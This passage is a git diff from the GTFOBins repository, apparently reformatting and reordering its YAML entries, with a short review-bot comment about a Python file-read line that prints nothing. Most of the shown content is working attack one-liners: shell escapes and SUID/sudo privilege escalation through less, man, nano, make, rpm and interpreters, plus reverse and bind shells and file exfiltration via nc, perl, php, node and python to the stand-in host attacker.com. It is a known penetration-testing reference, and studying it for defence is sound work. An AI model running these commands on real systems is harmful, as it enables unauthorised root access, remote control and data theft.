- ksh -c 'echo data > $LFILE'
+ - code: |
+ export LFILE=file_to_write
+ ksh -c 'echo data > $LFILE'
+ file-read:
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c 'echo "$(<$LFILE)"'
+ - description: It trims trailing newlines.
+ code: |
+ export LFILE=file_to_read
+ ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
+ suid-enabled:
+ - code: "./ksh -p"
+ sudo-enabled:
+ - code: sudo ksh
 ---
diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md
index b908a97..081ec5a 100644
--- a/_gtfobins/ld.so.md
+++ b/_gtfobins/ld.so.md
@@ -9,9 +9,9 @@ description: |
 ```
 functions:
 execute-interactive:
- - code: /lib/ld.so /bin/sh
- sudo-enabled:
- - code: sudo /lib/ld.so /bin/sh
+ - code: "/lib/ld.so /bin/sh"
 suid-enabled:
- - code: ./ld.so /bin/sh -p
+ - code: "./ld.so /bin/sh -p"
+ sudo-enabled:
+ - code: sudo /lib/ld.so /bin/sh
 ---
diff --git a/_gtfobins/less.md b/_gtfobins/less.md
index f8b34ce..d6d9044 100644
--- a/_gtfobins/less.md
+++ b/_gtfobins/less.md
@@ -1,21 +1,22 @@
 ---
 functions:
 execute-interactive:
- - code: |
- less /etc/profile
- !/bin/sh
- - code: |
- VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
- v
- sudo-enabled:
- - code: |
- sudo less /etc/profile
- !/bin/sh
- suid-limited:
- - code: |
- ./less /etc/profile
- !/bin/sh
+ - code: |
+ less /etc/profile
+ !/bin/sh
+ - code: |
+ VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
+ v
 file-read:
- - code: |
- less file_to_read
+ - code: 'less file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo less /etc/profile
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./less /etc/profile
+ !/bin/sh
 ---
diff --git a/_gtfobins/ltrace.md b/_gtfobins/ltrace.md
index f7b420b..b962133 100644
--- a/_gtfobins/ltrace.md
+++ b/_gtfobins/ltrace.md
@@ -1,7 +1,7 @@
 ---
 functions:
 execute-interactive:
- - code: ltrace -b -L /bin/sh
+ - code: ltrace -b -L /bin/sh
 sudo-enabled:
- - code: sudo ltrace -b -L /bin/sh
+ - code: sudo ltrace -b -L /bin/sh
 ---
diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md
index c6f46d1..ec40e5a 100644
--- a/_gtfobins/mail.md
+++ b/_gtfobins/mail.md
@@ -1,17 +1,17 @@
 ---
 functions:
 execute-interactive:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ mail -f $TF
+ !/bin/sh
 sudo-enabled:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- sudo mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ sudo mail -f $TF
+ !/bin/sh
 ---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index ec86fc7..4153bdf 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -5,20 +5,20 @@ description: |
 passing the content via stdin using `-f -`.
 functions:
 execute-interactive:
- - code: |
- COMMAND='/bin/sh'
- make -s --eval=$'x:\n\t-'"$COMMAND"
- sudo-enabled:
- - code: |
- COMMAND='/bin/sh'
- sudo make -s --eval=$'x:\n\t-'"$COMMAND"
- suid-enabled:
- - code: |
- COMMAND='/bin/sh -p'
- ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ - code: |
+ COMMAND='/bin/sh'
+ make -s --eval=$'x:\n\t-'"$COMMAND"
 file-write:
- - description: Requires a newer GNU `make` version.
- code: |
- LFILE=file_to_write
- make -s --eval="\$(file >$LFILE,data)" .
+ - description: Requires a newer GNU `make` version.
+ code: |
+ LFILE=file_to_write
+ make -s --eval="\$(file >$LFILE,data)" .
+ suid-enabled:
+ - code: |
+ COMMAND='/bin/sh -p'
+ ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ sudo-enabled:
+ - code: |
+ COMMAND='/bin/sh'
+ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
 ---
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index 43814c7..8ccabe2 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,18 +1,19 @@
 ---
 functions:
 execute-interactive:
- - code: |
- man man
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo man man
- !/bin/sh
- suid-limited:
- - code: |
- ./man man
- !/bin/sh
+ - code: |
+ man man
+ !/bin/sh
 file-read:
- - code: |
- man file_to_read
+ - code: 'man file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo man man
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./man man
+ !/bin/sh
 ---
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index eda72d0..823fa04 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,17 +1,17 @@
 ---
 functions:
 execute-interactive:
- - code: |
- TERM= more /etc/profile
- !/bin/sh
- sudo-enabled:
- - code: |
- TERM= sudo -E more /etc/profile
- !/bin/sh
- suid-enabled:
- - code: |
- ./more file_to_read
+ - code: |
+ TERM= more /etc/profile
+ !/bin/sh
 file-read:
- - code: |
- more file_to_read
+ - code: 'more file_to_read
+
+'
+ suid-enabled:
+ - code: "./more file_to_read\n"
+ sudo-enabled:
+ - code: |
+ TERM= sudo -E more /etc/profile
+ !/bin/sh
 ---
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index f4895e1..d45f451 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -1,37 +1,38 @@
 ---
 functions:
 execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- nano -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo nano -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./nano -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- nano file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ nano -s $TF /etc/hosts
+ ^T
 file-write:
- - code: |
- nano file_to_write
- ^O
+ - code: |
+ nano file_to_write
+ ^O
+ file-read:
+ - code: 'nano file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./nano -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo nano -s $TF /etc/hosts
+ ^T
 ---
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index fc4e27b..b285423 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,27 +1,29 @@
 ---
 functions:
- upload:
- - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- nc $RHOST $RPORT < "$LFILE"
- download:
- - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- LPORT=12345
- LFILE=file_to_save
- nc -l -p $LPORT > "$LFILE"
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- nc -e /bin/sh $RHOST $RPORT
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ nc -e /bin/sh $RHOST $RPORT
 bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- nc -l -p $LPORT -e /bin/sh
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ nc -l -p $LPORT -e /bin/sh
+ upload:
+ - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ nc $RHOST $RPORT < "$LFILE"
+ download:
+ - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
+ < "file_to_send"` on the attacker box to send the file.
+ code: |
+ LPORT=12345
+ LFILE=file_to_save
+ nc -l -p $LPORT > "$LFILE"
 ---
diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md
index f8309cc..4d57bd2 100644
--- a/_gtfobins/nl.md
+++ b/_gtfobins/nl.md
@@ -1,17 +1,19 @@
 ---
-description: |
- The read file content is corrupted by a leading space added to each line.
+description: 'The read file content is corrupted by a leading space added to each
+ line.
+
+'
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo nl -bn -w1 -s '' $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./nl -bn -w1 -s '' $LFILE
 file-read:
- - code: |
- LFILE=file_to_read
- nl -bn -w1 -s '' $LFILE
+ - code: |
+ LFILE=file_to_read
+ nl -bn -w1 -s '' $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./nl -bn -w1 -s '' $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo nl -bn -w1 -s '' $LFILE
 ---
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 9c9aa35..214c045 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,33 +1,38 @@
 ---
 functions:
 execute-interactive:
- - code: |
- node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- sudo-enabled:
- - code: |
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- suid-enabled:
- - code: |
- ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
+ - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
+
+'
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- net.connect(process.env.RPORT, process.env.RHOST, function () {
- this.pipe(sh.stdin);
- sh.stdout.pipe(this);
- sh.stderr.pipe(this);
- });'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ net.connect(process.env.RPORT, process.env.RHOST, function () {
+ this.pipe(sh.stdin);
+ sh.stdout.pipe(this);
+ sh.stderr.pipe(this);
+ });'
 bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- export LPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- require("net").createServer(function (client) {
- client.pipe(sh.stdin);
- sh.stdout.pipe(client);
- sh.stderr.pipe(client);
- }).listen(process.env.LPORT);'
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ export LPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ require("net").createServer(function (client) {
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ }).listen(process.env.LPORT);'
+ suid-enabled:
+ - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
+ 1, 2]});''
+
+'
+ sudo-enabled:
+ - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
+ 2]});''
+
+'
 ---
diff --git a/_gtfobins/od.md b/_gtfobins/od.md
index 4cf623b..8644d85 100644
--- a/_gtfobins/od.md
+++ b/_gtfobins/od.md
@@ -3,16 +3,16 @@ description: |
 Three spaces are added before each character in the read file, and non-printable
 chars are printed as backslash escape sequences.
 functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo od -An -c -w9999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./od -An -c -w9999 "$LFILE"
 file-read:
- - code: |
- LFILE=file_to_read
- od -An -c -w9999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ od -An -c -w9999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./od -An -c -w9999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo od -An -c -w9999 "$LFILE"
 ---
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index c423a7f..f781b65 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,15 +1,15 @@
 ---
 functions:
 execute-interactive:
- - code: perl -e 'exec "/bin/sh";'
- sudo-enabled:
- - code: sudo perl -e 'exec "/bin/sh";'
- suid-enabled:
- - code: ./perl -e 'exec "/bin/sh";'
+ - code: perl -e 'exec "/bin/sh";'
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ suid-enabled:
+ - code: ./perl -e 'exec "/bin/sh";'
+ sudo-enabled:
+ - code: sudo perl -e 'exec "/bin/sh";'
 ---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 944ba2a..ca9e4ea 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -17,33 +17,34 @@ functions:
 export CMD="/bin/sh"
 php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
 execute-non-interactive:
- - code: |
- export CMD="id"
- php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
- sudo-enabled:
- - code: |
- CMD="/bin/sh"
- sudo php -r "system('$CMD');"
- suid-enabled:
- - code: |
- CMD="/bin/sh"
- ./php -r "system('$CMD');"
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
- code: |
- LHOST=0.0.0.0
- LPORT=8888
- php -S $LHOST:$LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ - code: |
+ export CMD="id"
+ php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
 reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ PHP version 5.4 or later.
+ code: |
+ LHOST=0.0.0.0
+ LPORT=8888
+ php -S $LHOST:$LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ suid-enabled:
+ - code: |
+ CMD="/bin/sh"
+ ./php -r "system('$CMD');"
+ sudo-enabled:
+ - code: |
+ CMD="/bin/sh"
+ sudo php -r "system('$CMD');"
 ---
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index 24c9ff4..c64f482 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -1,37 +1,38 @@
 ---
 functions:
 execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- pico -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo pico -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./pico -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- pico file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ pico -s $TF /etc/hosts
+ ^T
 file-write:
- - code: |
- pico file_to_write
- ^O
+ - code: |
+ pico file_to_write
+ ^O
+ file-read:
+ - code: 'pico file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./pico -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo pico -s $TF /etc/hosts
+ ^T
 ---
diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md
index de2c5ef..a4ae2d9 100644
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@@ -1,23 +1,24 @@
 ---
 functions:
 execute-non-interactive:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- puppet apply -e "exec { '$CMD': logoutput => true }"
- sudo-enabled:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- sudo puppet apply -e "exec { '$CMD': logoutput => true }"
- file-read:
- - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
- code: |
- export LFILE=file_to_read
- puppet filebucket -l diff /dev/null $LFILE
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ puppet apply -e "exec { '$CMD': logoutput => true }"
 file-write:
- - description: The file path must be absolute.
- code: |
- export LFILE="/tmp/file_to_write"
- puppet apply -e "file { '$LFILE': content => 'data' }"
+ - description: The file path must be absolute.
+ code: |
+ export LFILE="/tmp/file_to_write"
+ puppet apply -e "file { '$LFILE': content => 'data' }"
+ file-read:
+ - description: The read file content is corrupted by the `diff` output format. The
+ actual `/usr/bin/diff` command is executed.
+ code: |
+ export LFILE=file_to_read
+ puppet filebucket -l diff /dev/null $LFILE
+ sudo-enabled:
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ sudo puppet apply -e "exec { '$CMD': logoutput => true }"
 ---
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index ea943c0..f2cce96 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -1,37 +1,39 @@
 ---
 functions:
 execute-interactive:
- - code: python2 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python2 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=8888
- python2 -m SimpleHTTPServer $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
+ - code: python2 -c 'import os; os.system("/bin/sh")'
 reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python2 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=8888
+ python2 -m SimpleHTTPServer $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
 file-write:
- - code: python2 -c 'open("file_to_write","w+").write("data")'
+ - code: python2 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python2 -c 'open("file_to_read").read()'
 load-library:
- - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python2 -c 'import os; os.system("/bin/sh")'
 ---
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 9796842..719151a 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
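Review bot: The file-read entry `python2 -c 'open("file_to_read").read()'` never writes the content anywhere: under `-c` the value of an expression statement is discarded (only the interactive prompt echoes it), so the command runs and prints nothing. It should be `python2 -c 'print(open("file_to_read").read())'`; python3.md carries the same entry and needs the same change. This predates the commit, which only moves the line, but it is the version now under review.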
@@ -1,37 +1,39 @@
 ---
 functions:
 execute-interactive:
- - code: python3 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python3 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- LPORT=8888
- python3 -m http.server $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
+ - code: python3 -c 'import os; os.system("/bin/sh")'
 reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python3 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ LPORT=8888
+ python3 -m http.server $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
 file-write:
- - code: python3 -c 'open("file_to_write","w+").write("data")'
+ - code: python3 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python3 -c 'open("file_to_read").read()'
 load-library:
- - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python3 -c 'import os; os.system("/bin/sh")'
 ---
diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md
index 65c1639..254f12d 100644
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@@ -1,14 +1,15 @@
 ---
 functions:
 execute-interactive:
- - code: rlwrap /bin/sh
- sudo-enabled:
- - code: sudo rlwrap /bin/sh
- suid-enabled:
- - code: ./rlwrap -H /dev/null /bin/sh -p
+ - code: rlwrap /bin/sh
 file-write:
- - description: This adds timestamps to the output file. This relies on the external `echo` command.
- code: |
- LFILE=file_to_write
- rlwrap -l "$LFILE" echo data
+ - description: This adds timestamps to the output file. This relies on the external
+ `echo` command.
+ code: |
+ LFILE=file_to_write
+ rlwrap -l "$LFILE" echo data
+ suid-enabled:
+ - code: "./rlwrap -H /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo rlwrap /bin/sh
 ---
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 67d2f53..268c69f 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
- - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
 suid-enabled:
- - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
 ---
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 5d9eee1..ce85849 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,9 +1,9 @@
 ---
 functions:
 execute-interactive:
- - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
- - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
 suid-enabled:
